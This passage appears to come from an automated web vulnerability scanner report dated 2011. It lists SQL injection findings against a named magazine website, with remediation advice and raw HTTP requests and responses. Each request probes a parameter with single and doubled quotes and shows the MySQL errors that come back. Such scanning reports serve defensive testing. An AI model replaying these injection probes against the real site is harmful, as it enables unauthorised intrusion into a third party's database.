Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/index.php?option=com_chronocontact&chronoformname=CGPage'' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_chronocontact&chronoformname=CGPage'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:47:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:47:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.175. http://www.soundingsonline.com/index.php [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_content&view=category&layout=blog&id=98'&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_content&view=category&layout=blog&id=98''&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.176. http://www.soundingsonline.com/index.php [layout parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

The layout parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the layout parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_content&view=category&layout=blog'&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_content&view=category&layout=blog''&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.177. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /index.php?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 25 Jan 2011 02:48:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-type: text/html

Request 2

GET /index.php?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.178. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_chronocontact&chronoformname=CGPage&1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:47:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:47:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_chronocontact&chronoformname=CGPage&1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:47:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:47:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.179. http://www.soundingsonline.com/index.php [option parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

The option parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the option parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_chronocontact'&chronoformname=CGPage HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_chronocontact''&chronoformname=CGPage HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.180. http://www.soundingsonline.com/index.php [view parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

The view parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the view parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_content&view=category'&layout=blog&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_content&view=category''&layout=blog&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.181. http://www.soundingsonline.com/more/digital-publications [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/more/digital-publications

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /more/digital-publications?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /more/digital-publications?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.182. http://www.soundingsonline.com/more/the-masters-series [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/more/the-masters-series

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /more/the-masters-series?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /more/the-masters-series?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

